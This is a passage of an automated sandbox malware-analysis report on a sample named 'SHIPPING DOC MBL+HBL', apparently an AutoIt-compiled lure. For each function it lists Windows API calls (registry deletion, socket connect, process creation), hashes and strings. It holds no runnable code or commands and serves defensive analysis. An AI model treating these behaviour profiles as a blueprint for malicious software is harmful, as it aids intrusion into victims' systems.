                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 8ffea39a9e8d1ad6bd90121d805ce1cf9f7975b6a278319cb4badda2b21af37c
                    • Instruction ID: 6547b0d1bbefbc44452504492f55705f891432b0995ef8ae87225f7adb52cb66
                    • Opcode Fuzzy Hash: 8ffea39a9e8d1ad6bd90121d805ce1cf9f7975b6a278319cb4badda2b21af37c
                    • Instruction Fuzzy Hash: D0413775A04208EFDB20EF50D884E9ABBF8FB04318F149029EDA9A7261D731ED55DB90
                    Function 00E8102D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E8105C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E81086
                    • FreeLibrary.KERNEL32(00000000), ref: 00E8113D
                      • Part of subcall function 00E8102D: RegCloseKey.ADVAPI32(?), ref: 00E810A3
                      • Part of subcall function 00E8102D: FreeLibrary.KERNEL32(?), ref: 00E810F5
                      • Part of subcall function 00E8102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E81118
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E810E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: f3b6739c844cd6b2c3c4f1d132aa5fb1f64dca821ebd80c30219bb348675c3e9
                    • Instruction ID: d36755709390251e2eec8c59d9c3a86b189b505acd7a8599faaf4f8552e3a2b4
                    • Opcode Fuzzy Hash: f3b6739c844cd6b2c3c4f1d132aa5fb1f64dca821ebd80c30219bb348675c3e9
                    • Instruction Fuzzy Hash: 28312BB1901109BFDB15DB91DC89EFFB7BCEF08344F1011A9E509F2151EA749E8A9BA0
                    Function 00E862FF Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E8631E
                    • GetWindowLongW.USER32(00FC5FB0,000000F0), ref: 00E86351
                    • GetWindowLongW.USER32(00FC5FB0,000000F0), ref: 00E86386
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00E863B8
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00E863E2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E863F3
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E8640D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                    • Instruction ID: 6bdde402addb06810fb9b7eeacd9569e9deadb137a833fe44d78066767b986bf
                    • Opcode Fuzzy Hash: 3e0dc32e414f3b47dd8f94af5c27cc2ae0a50ea501c99aeee88c100d0265901c
                    • Instruction Fuzzy Hash: A63114316042009FDB21DF19DC84F5437E1FB8A714F181174F518AF2B2CB62A885EB51
                    Function 00E76289 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77ECB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E762DC
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E762EB
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76324
                    • connect.WSOCK32(00000000,?,00000010), ref: 00E7632D
                    • WSAGetLastError.WSOCK32 ref: 00E76337
                    • closesocket.WSOCK32(00000000), ref: 00E76360
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E76379
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 76fd46c32c94010b7efd513151d1b29f1439d54f8e41532b49de906971d28dab
                    • Instruction ID: 95d1056370bc32e8f533818a76bb5c8496ceabc80a675e690edf2b78e3ada37f
                    • Opcode Fuzzy Hash: 76fd46c32c94010b7efd513151d1b29f1439d54f8e41532b49de906971d28dab
                    • Instruction Fuzzy Hash: 08319331600518AFDB149F64CC85BBE77E9EB84728F049069FD49B7292DB70AC48CBA1
                    Function 00E5F98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: b97a3536b15371a244e63f5bcbc0fd52127c17bce5b30df8aa55a004bd58e603
                    • Instruction ID: aaeab0aa2bf561f51c296b973b8e874a0ad653fbc1f26ef92ccae4da5ede9813
                    • Opcode Fuzzy Hash: b97a3536b15371a244e63f5bcbc0fd52127c17bce5b30df8aa55a004bd58e603
                    • Instruction Fuzzy Hash: 2221493220862176D621AB359C02FF773D89F91315F506839FD8AB61C3EB949D8AC292
                    Function 00E875FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87664
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E87671
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E8767C
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E8768B
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 6270f767528ac35fbf7f767b239065c2731c27f4d14c3c838d9e59ab4aef2471
                    • Instruction ID: dd033286d5d8c8f5b911770c6186f2da3d24ad2ce9abe582ae6140bad93ff15a
                    • Opcode Fuzzy Hash: 6270f767528ac35fbf7f767b239065c2731c27f4d14c3c838d9e59ab4aef2471
                    • Instruction Fuzzy Hash: 1511E2B2150219BFEF109F64CC81EE77F6DEF08358F115125BA48B20A0D772AC21EBA0
                    Function 00E8B669 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E8B678
                    • _memset.LIBCMT ref: 00E8B687
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC6F20,00EC6F64), ref: 00E8B6B6
                    • CloseHandle.KERNEL32 ref: 00E8B6C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID: o$do
                    • API String ID: 3277943733-2180341428
                    • Opcode ID: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                    • Instruction ID: 8e1e7cb207563d8b722a40e88ff1fa79b231157643d341ef199c036d5d164bdc
                    • Opcode Fuzzy Hash: 143fea7fe0a4a6ac6353e14aa885b869ce9bcf1004358680952d8654ac7eba36
                    • Instruction Fuzzy Hash: B4F05EB2740354BEF2102B62BC06FBB3B9CEB08354F005038FA08F51A2D7729C0587A8
                    Function 00E24109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E241D2,?), ref: 00E24123
                    • GetProcAddress.KERNEL32(00000000), ref: 00E2412A
                    • EncodePointer.KERNEL32(00000000), ref: 00E24136
                    • DecodePointer.KERNEL32(00000001,00E241D2,?), ref: 00E24153
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 11c65d3e17654bc8a9e3eccb958b68873766001af903e943ca32c0154de0fd2d
                    • Instruction ID: ceabe8e585647aac01e15cabad5ed8fff88652eb70be55477ef3160756d17a9c
                    • Opcode Fuzzy Hash: 11c65d3e17654bc8a9e3eccb958b68873766001af903e943ca32c0154de0fd2d
                    • Instruction Fuzzy Hash: 1AE01A70692300AFEF116B72EC0DF443AA4AB16B07F109438F545F50F0CBB681899F00
                    Function 00E241DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E240F8), ref: 00E241F8
                    • GetProcAddress.KERNEL32(00000000), ref: 00E241FF
                    • EncodePointer.KERNEL32(00000000), ref: 00E2420A
                    • DecodePointer.KERNEL32(00E240F8), ref: 00E24225
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                    • Instruction ID: 8b4bb4541e5540d7f2befdb45cf680dd5c27ca58772265c1dce33d2b2e73f66d
                    • Opcode Fuzzy Hash: cac7f33a9e69e275611f9fc365652dab12cae7fd575f08d97cbfe3e283e7a29f
                    • Instruction Fuzzy Hash: C6E07EB0592300AEEA109B73AD0DB453AA4AB04B46F18902AF115F10B0CBB786099B14
                    Function 00E66561 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: d71ad6ed913707e2b815a32644a8879520e2049a879510b7f1fec780915a6271
                    • Instruction ID: f278bed400bf711c3860e0191e5acd62b60ed64ba440b91d9478668f323b4e2b
                    • Opcode Fuzzy Hash: d71ad6ed913707e2b815a32644a8879520e2049a879510b7f1fec780915a6271
                    • Instruction Fuzzy Hash: 1E619A3065025A9BDF11EF64E882AFE7BE4AF44348F046519F89A7B1D3DB30AD41CB90
                    Function 00E8026F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80348
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E80388
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E803AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E803D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E80417
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80424
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: 21175da51eac87eb3b6fa655d1a49cd50fa1a0c9b12a0d947b925caf7a78561a
                    • Instruction ID: 77a4789cebf6ca9b8b628431719bb9111b5d488fa9731544d8dd66c9e57616dc
                    • Opcode Fuzzy Hash: 21175da51eac87eb3b6fa655d1a49cd50fa1a0c9b12a0d947b925caf7a78561a
                    • Instruction Fuzzy Hash: FA513931208200AFD714EF64D885E6FBBE9FF88314F04591DF599A72A2DB31E949CB52
                    Function 00E85802 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetMenu.USER32(?), ref: 00E85864
                    • GetMenuItemCount.USER32(00000000), ref: 00E8589B
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E858C3
                    • GetMenuItemID.USER32(?,?), ref: 00E85932
                    • GetSubMenu.USER32(?,?), ref: 00E85940
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85991
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 748ec243a7faab1b9a011b46aeeb93bd0091ca063d82a3232d9bb1af1499fc2a
                    • Instruction ID: 9cda5e4e581923f477647e08079821997371ebfcc9177c44f1b65ee8ce8d2f5a
                    • Opcode Fuzzy Hash: 748ec243a7faab1b9a011b46aeeb93bd0091ca063d82a3232d9bb1af1499fc2a
                    • Instruction Fuzzy Hash: C0519436A00615EFCF15EFA4C845AAEB7F4EF48320F10546AE959B7351CB70AE41CB90
                    Function 00E5F1FE Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E5F218
                    • VariantClear.OLEAUT32(00000013), ref: 00E5F28A
                    • VariantClear.OLEAUT32(00000000), ref: 00E5F2E5
                    • _memmove.LIBCMT ref: 00E5F30F
                    • VariantClear.OLEAUT32(?), ref: 00E5F35C
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F38A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: 19e0e943d663eb06d1c175f95a39f80f8bbde664aec7a9fdfb5359158a7f53bd
                    • Instruction ID: 7446d9f14bdb531d851dee1e8c1cf9d4120e85c8a75dba799fe585759c58bb42
                    • Opcode Fuzzy Hash: 19e0e943d663eb06d1c175f95a39f80f8bbde664aec7a9fdfb5359158a7f53bd
                    • Instruction Fuzzy Hash: EE5139B5A00209EFDB14CF58C884AAAB7B8FF4C315B15856AED59EB301D730E915CFA0
                    Function 00E62502 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E62550
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E6259B
                    • IsMenu.USER32(00000000), ref: 00E625BB
                    • CreatePopupMenu.USER32 ref: 00E625EF
                    • GetMenuItemCount.USER32(000000FF), ref: 00E6264D
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E6267E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                    • Instruction ID: 21e69acd8abcc3b44dbc4df8742b966450ce8aab3f3fe3723caea6e1a59611d7
                    • Opcode Fuzzy Hash: 4990fe1e85cbd0d17354cb504e02a643d31b07fd134a5fc940029e97e2ea7889
                    • Instruction Fuzzy Hash: 2B51C170A40A06DFDF20CF68E888AADBBF4BF14398F14916DEA15B7290D7709944CB52
                    Function 00E01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E0179A
                    • GetWindowRect.USER32(?,?), ref: 00E017FE
                    • ScreenToClient.USER32(?,?), ref: 00E0181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E0182C
                    • EndPaint.USER32(?,?), ref: 00E01876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 6ae6c0c6d9ea3ddb7fb205d4002f66f9d8e52db059891826576d4fa0735d76c9
                    • Instruction ID: 6f16c40b987b4fa31e0c6db431f6cc1668f40170c2ba0e27edc48ff04686b8b0
                    • Opcode Fuzzy Hash: 6ae6c0c6d9ea3ddb7fb205d4002f66f9d8e52db059891826576d4fa0735d76c9
                    • Instruction Fuzzy Hash: E841B031100200AFC710DF25DC88FBA7BE8EB45724F044279FA95AA1F2C731A889DB61
                    Function 00E8B6D2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(00EC57B0,00000000,00FC5FB0,?,?,00EC57B0,?,00E8B5DC,?,?), ref: 00E8B746
                    • EnableWindow.USER32(00000000,00000000), ref: 00E8B76A
                    • ShowWindow.USER32(00EC57B0,00000000,00FC5FB0,?,?,00EC57B0,?,00E8B5DC,?,?), ref: 00E8B7CA
                    • ShowWindow.USER32(00000000,00000004,?,00E8B5DC,?,?), ref: 00E8B7DC
                    • EnableWindow.USER32(00000000,00000001), ref: 00E8B800
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E8B823
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
                    • Instruction ID: f8c302eb3a5ba13879fddfda31525f73679d986067f38e2f1b168f075db62ab8
                    • Opcode Fuzzy Hash: d58846d53e86329f143a8c7d139c7414566ace6c17fff59a270cff09a55b610c
